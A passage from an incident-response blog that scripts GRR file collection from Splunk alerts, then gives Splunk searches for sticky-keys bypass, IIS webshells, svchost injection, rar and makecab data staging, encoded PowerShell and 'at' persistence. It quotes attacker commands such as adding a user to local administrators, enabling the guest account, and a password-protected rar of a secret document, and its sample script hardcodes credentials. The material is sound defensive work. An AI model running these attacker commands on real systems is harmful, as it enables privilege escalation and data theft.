<li><span style="font-family: Arial, Helvetica, sans-serif;">Opens the Splunk search results (unzips the gzipped CSV and reads the host value).</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Executes 'grrRemoteGetFile.py' with the system's default python, passing the hostname that triggered the alert.</span></li>
</ul>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Splunk will pass 9 variables to the script when it executes. Variable 8 contains the path to the gzipped search results in CSV format. </span><span style="font-family: Arial, Helvetica, sans-serif;">The other variables are documented <a href="http://docs.splunk.com/Documentation/Splunk/6.0/Alert/Configuringscriptedalerts" target="_blank">here</a>.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">grrRemoteGetFile.py </span><br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">#!/usr/bin/python
import sys, json, base64, requests
from requests.auth import HTTPBasicAuth

# wrapper.py runs this as: /usr/bin/python grrRemoteGetFile.py &lt;host&gt;
# so the hostname is the first argument.
hostname = sys.argv[1]
grrserver = 'https://grrserver:8000'
username = 'Tupac'
password = 'isAlive'

base64string = base64.encodestring('%s:%s' % (username, password)).replace('\n', '')
authheader = "Basic %s" % base64string

# Fetch the index page first to obtain the CSRF cookie the API requires.
index_response = requests.get(grrserver, auth=HTTPBasicAuth(username, password))
csrf_token = index_response.cookies.get("csrftoken")
headers = {
    "Authorization": authheader,
    "x-csrftoken": csrf_token,
    "x-requested-with": "XMLHttpRequest"
}
# Globs for the renamed wscript.exe copy, its script and the startup LNK.
data = {
    "hostname": hostname,
    "paths": [r"%%users.appdata%%\Roaming\*\*.{js,exe}",
              r"%%users.appdata%%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk"],
    "pathtype": "OS"
}
response = requests.post(grrserver + "/api/clients/" + hostname + "/flows/remotegetfile",
                         headers=headers, data=json.dumps(data),
                         cookies=index_response.cookies, auth=HTTPBasicAuth(username, password))
response.raise_for_status()
</code></pre>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">'grrRemoteGetFile.py' will start a FileFinder flow on the 'hostname' variable passed to it by the 'wrapper.py' script. </span><span style="font-family: Arial, Helvetica, sans-serif;">When IR staff is able to review the ticket, the files will be available in GRR to download and review.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>In Summary...</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">This is just a basic example to demonstrate how all the pieces fit together. There are some really</span><span style="font-family: Arial, Helvetica, sans-serif;"> cool things you can do with these tools to automate stuff. Some things I've been playing with:</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Automatically launch Incident Response Collector ($MFT, Registry, Browser History, etc.) and full memory image when a known bad MD5 or static indicator is seen in Splunk.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Utilize WLS's hash tracking to automatically submit new binaries to internal malware analysis tools. Splunk alert would be:</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) NewHash=True</span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;">In the wrapper.py, you would add row["NewProcessName"] and pass it to grrRemoteGetFile.py to download (instead of the static path in the example above).</span><br />
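<span style="font-family: Arial, Helvetica, sans-serif;">The hand-off between wrapper.py and grrRemoteGetFile.py as an added, self-contained example (not code from the post, from GRR or from Splunk): it reads Splunk's gzipped results CSV, de-duplicates hosts, builds the body for the remotegetfile call, and also shows the NewProcessName variant described above, where the triggering binary's own path is collected instead of the static globs. The results file, the GRR URL and the hostnames are constructed placeholders, and the request is only built, not sent, so it runs offline.</span><br />

```python
#!/usr/bin/env python3
"""Added example, not the post's own scripts: Splunk results -> GRR request.
The sample results file, GRR URL and hostnames below are constructed."""
import csv
import gzip
import json
import os
import tempfile

# FileFinder globs from the post; the NewProcessName variant replaces these
# with the path of the binary that triggered the alert.
DEFAULT_PATHS = [
    r"%%users.appdata%%\Roaming\*\*.{js,exe}",
    r"%%users.appdata%%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk",
]


def openany(path):
    """Open Splunk's results file: gzipped CSV, or plain CSV if not .gz."""
    if path.endswith(".gz"):
        return gzip.open(path, "rt", newline="")
    return open(path, "rt", newline="")


def hosts_from_results(path, path_field=None):
    """Return {host: [paths]} from the alert's results CSV.

    Splunk writes one row per matching event, so a host may appear several
    times; we launch one collection per host, not per row. With path_field
    set (e.g. "NewProcessName" for the NewHash=True alert) each row's value
    of that field is collected instead of the static globs.
    """
    targets = {}
    with openany(path) as fh:
        for row in csv.DictReader(fh):
            host = (row.get("host") or "").strip()
            if not host:
                continue  # a row without a host cannot be actioned
            paths = targets.setdefault(host, [])
            if path_field is None:
                if not paths:
                    paths.extend(DEFAULT_PATHS)
            else:
                value = (row.get(path_field) or "").strip()
                if value and value not in paths:
                    paths.append(value)
    return targets


def build_remotegetfile_request(grrserver, hostname, paths, pathtype="OS"):
    """Build the URL and JSON body used by the post's requests.post call."""
    url = "%s/api/clients/%s/flows/remotegetfile" % (grrserver.rstrip("/"), hostname)
    body = {"hostname": hostname, "paths": list(paths), "pathtype": pathtype}
    return url, json.dumps(body, sort_keys=True)


def write_sample_results(directory):
    """Write a constructed results .gz: three events, one host seen twice."""
    rows = [
        {"host": "WIN-1UJAK6S06VK", "EventID": "4688",
         "NewProcessName": r"C:\Users\tupac\AppData\Roaming\avseda\udpbat.exe"},
        {"host": "WIN-1UJAK6S06VK", "EventID": "4688",
         "NewProcessName": r"C:\Users\tupac\AppData\Roaming\avseda\udpbat.exe"},
        {"host": "WINTETST", "EventID": "592",
         "NewProcessName": r"C:\Users\bob\Downloads\setup.exe"},
    ]
    path = os.path.join(directory, "results.csv.gz")
    with gzip.open(path, "wt", newline="") as fh:
        writer = csv.DictWriter(fh, fieldnames=["host", "EventID", "NewProcessName"])
        writer.writeheader()
        writer.writerows(rows)
    return path


def demo():
    """Run both modes over the sample file; returns (static, by_binary) dicts."""
    with tempfile.TemporaryDirectory() as tmp:
        results = write_sample_results(tmp)
        static = hosts_from_results(results)
        by_binary = hosts_from_results(results, path_field="NewProcessName")
    return static, by_binary


if __name__ == "__main__":
    static, by_binary = demo()
    for host, paths in by_binary.items():
        url, body = build_remotegetfile_request("https://grrserver:8000", host, paths)
        print(url, body)
```

<span style="font-family: Arial, Helvetica, sans-serif;">De-duplicating per host matters in practice: a noisy alert can return dozens of rows for one machine, and the post's wrapper would start one GRR flow for each of them. Sending the built request is the same requests.post call shown in grrRemoteGetFile.py above.</span><br />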
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Get any executable downloaded from the internet and send it to internal malware analysis tools.</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) Zone=3</span></span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;">Get any compressed file attachment opened from Outlook email and send to internal malware analysis tools.</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) CreatorProcessName=OUTLOOK BaseFileName=winzip*</span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">If you have any examples/suggestions on automation with GRR and WLS/Splunk, share them on the <a href="https://groups.google.com/forum/#!forum/grr-users" target="_blank">GRR user group</a>, I'm really interested to hear what other folks have done.</span><br />
<div>
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-42703841984817365852015-08-23T15:36:00.000-07:002015-08-23T15:36:29.194-07:00DFIR with Windows Logging Service (WLS)<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 14.6666666666667px; line-height: 1.38; white-space: pre-wrap;">WLS is a logging service built with forensics and incident response in mind. The best way to explain what WLS is, is to show an example:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is what you get from a process creation event from Windows:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2014 Nov 21 21:39:28	10.10.10.10	WINTETST.domain.com	MSWinEventLog	0	Security	2099	nov 21 16:39:28 2014	4688	Microsoft-Windows-Security-Auditing	domain\WINTETST$	N/A	Success Audit	WINTETST.domain.com	Process Creation		A new process has been created. Subject: Security ID: S-1-5-18 Account Name: WINTETST$ Account Domain: DOMAIN Logon ID: 0x3e7 Process Information: New Process ID: 0xf0c New Process Name: C:\Windows\System32\dllhost.exe Token Elevation Type: TokenElevationTypeLimited (3) Creator Process ID: 0x2d4 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is what WLS logs:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Aug 23 12:57:57 win-1ujak6s06vk. Security: LogType="WLS", BaseFileName="notepad.exe", Channel="Security", CommandLine="'C:\Windows\system32\notepad.exe'", CompanyName="Microsoft Corporation", Computer="WIN-1UJAK6S06VK", CreatorProcessName="explorer", Entropy="6.95893575618574", EventID="4688", EventRecordID="72208", ExecutionProcessID="4", ExecutionThreadID="56", FileDescription="Notepad", FileVersion="6.1.7600.16385 (win7_rtm.090713-1255)", InternalName="Notepad", Keywords="0x8020000000000000", Language="English (United States)", Length="193536", Level="0", MD5="F2C7BB8ACC97F92E987A2D4087D021B1", NewProcessId="0x8a8", NewProcessName="C:\Windows\System32\notepad.exe", Opcode="0",ProcessId="0x8ec",ProductVersion="6.1.7600.16385",ProviderGuid="{54849625-5478-4994-A5BA-3E3B0328C30D}", ProviderName="Microsoft-Windows-Security-Auditing", SessionId="2",SESSIONNAME="Console",SHA1="7EB0139D2175739B3CCB0D1110067820BE6ABD29",Signed="Catalog",SSDeep="3072:QOrerAgXWMI6vKoTN6p0frxJLgf7nDVF6PUp1Yo3ICgx:QWDcRgNpex5gfzDVlVXg",SubjectDomainName="WIN-1UJAK6S06VK",SubjectLogonId="0x1fc0a2",SubjectUserName="testuser",SubjectUserSid="S-1-5-21-874994001-2474262622-3605836291-1008", Task="13312", TokenElevationType="TokenElevationTypeDefault (1)",ValidSignatureDate="False", Version="1", WindowStation="Winsta0\Default", Zone="0"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">All the useless information is replaced with useful information. More details on WLS can be found here </span><a href="http://digirati82.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://digirati82.com/</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. I’m writing this blogpost to share some methods for detecting malicious behavior and malware using WLS and Splunk. </span></div>
<b style="font-weight: normal;"><br /><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Sticky Keys Authentication Bypass</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Using sticky keys to bypass authentication is a favorite since it doesn’t involve malicious binaries. This method relies on replacing sethc.exe, utilman.exe, osk.exe, magnify.exe or narrator.exe with cmd.exe in the windows\system32\ directory. Since we are capturing the file metadata on execution, detecting this malicious behavior is simple. Create a scheduled Splunk job to email you when the event count is >0 for this search:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) FileDescription="Windows Command Processor" BaseFileName!=cmd.exe</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">A legitimate execution of the command prompt will contain the file description of “Windows Command Processor” with the BaseFileName of “cmd.exe”; a copy of cmd.exe renamed to one of the accessibility binaries keeps the description but not the name.</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Webshell / Compromised Web Server Detection</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In some web server compromises, attackers will add a webshell allowing them command line access for lateral movement, among other things. Since we know that the IIS service account shouldn’t normally be running ‘cmd.exe’ or commands like whoami, netstat, “net localgroup administrators pwnu /add” or even “net user guest /active:yes”, we can create a Splunk alert to notify us when this behavior does occur.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Here is an example WLS event snippet of a compromised IIS webserver executing the command prompt through a webshell:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BaseFileName="cmd.exe", Channel="Security", CompanyName="Microsoft Corporation", Computer="WIN-1UJAK6S06VK", CreatorProcessName="w3wp", EventID="4688", SubjectUserSid="S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415", NewProcessName="C:\Windows\System32\cmd.exe", SubjectUserName="DefaultAppPool"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">An example Splunk search to alert on this activity:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) CreatorProcessName="w3wp" NewProcessName="C:\Windows\System32\cmd.exe"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Maybe it’s a good idea to see ALL command line activity by the IIS user:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main WLS_CommandMonitor User="IIS APPPOOL\\DefaultAppPool"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">We know what an IIS server should not do, and alerting on that known-bad behavior is a simple way to increase the odds of finding a compromised server. Baseline first: some web applications legitimately spawn helper processes from w3wp.exe, and those need to be excluded from the alert rather than left to bury the real hits.</span></div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Svchost.exe Injection</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some malware starts a legitimate copy of svchost.exe and injects code into it, so that the malicious code runs under a trusted process name. This hiding technique is easy to alert on: svchost.exe is normally started by services.exe, so a Splunk alert on any svchost.exe execution whose creator process is not services.exe will catch it (expect to add a small allowlist of legitimate exceptions once you have baselined your Windows builds). Here is a snippet of what a malicious execution looks like:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">BaseFileName="svchost.exe", Channel="Security", CommandLine="'c:\Windows\System32\svchost.exe", CompanyName="Microsoft Corporation", Computer="WIN-1UJAK6S06VK", CreatorProcessName="mspswls.tmp", EventID="4688", </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Our Splunk search to alert on this behavior would look like this. Note that the snippets above show CreatorProcessName both as "w3wp" and as "mspswls.tmp", so check whether your WLS build records the ".exe" suffix on the parent name and match the form it actually emits; if it strips the suffix, CreatorProcessName!="services.exe" excludes nothing.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main (EventID=4688 OR EventID=592) BaseFileName=svchost.exe CreatorProcessName!="services.exe"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Alerting on Attacker Behavior</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some attackers follow a pattern after gaining access: gather system information, escalate privileges, move laterally, establish persistence, then collect and exfiltrate data. Their tools change constantly to evade detection, but their behavior, and the behavior of their tools, changes much more slowly. A good example is the staging of data for exfil. Attackers sometimes use a custom build of rar to password protect a file; in several versions found on VirusTotal they all use the standard command flags 'a -hp' to create an archive and encrypt it.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SomeExecutable.exe </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">a -hp</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SomePassword RandomFilename RandomFilePath </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Based on this we can add a scheduled search in Splunk for the following. (rar's -p switch encrypts only the file contents; -hp also encrypts the archive headers so the file names are hidden, which is why it is the one that shows up in staging.)</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main WLS_CommandMonitor Command="*a -hp*"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Example WLS CommandMonitor Log</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Aug 23 13:39:09 win-1ujak6s06vk. WLS_CommandMonitor: LogType="WLS", Command="a.exe a -hpqwerty123 data1.rar supersecret.doc", ProcessId="0x11c", ProcessName="cmd", Type="Added", User="WIN-1UJAK6S06VK\testuser", WLSKey="122"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Some attackers use makecab.exe to compress data before exfil. It is present on every Windows system and few people run it by hand, so alerting on its execution is worth considering. Windows servicing components do invoke makecab.exe themselves (for example to compress CBS logs), so baseline the creator process before promoting this from a hunt to an alert.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Other APT groups also use PowerShell for persistence, as described in this FireEye </span><a href="https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">report</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (M-Trends 2015). Using the same approach as above we create a scheduled Splunk search on the "-enc" parameter passed to powershell.exe. Keep in mind that -enc is only an abbreviation of -EncodedCommand: powershell.exe accepts shorter forms such as -e and -ec, and it also accepts Unicode dashes in place of the hyphen, so a search for the literal "-enc" is a starting point rather than a complete detection.</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Example attacker activity from </span><a href="https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..." </span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Example Splunk alert. The Command field in WLS CommandMonitor events begins with the image path, as in the report excerpt above, so the search needs a leading wildcard:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.6666666666667px; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">index=main WLS_CommandMonitor Command="*powershell* -enc *"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Another popular persistence method is scheduling "at" jobs. Since the command line is logged and few people use at.exe, results should be low. On Windows 8 and later at.exe is deprecated in favour of schtasks.exe, so cover "schtasks /create" in the same way:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=main WLS_CommandMonitor Command="at *"</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
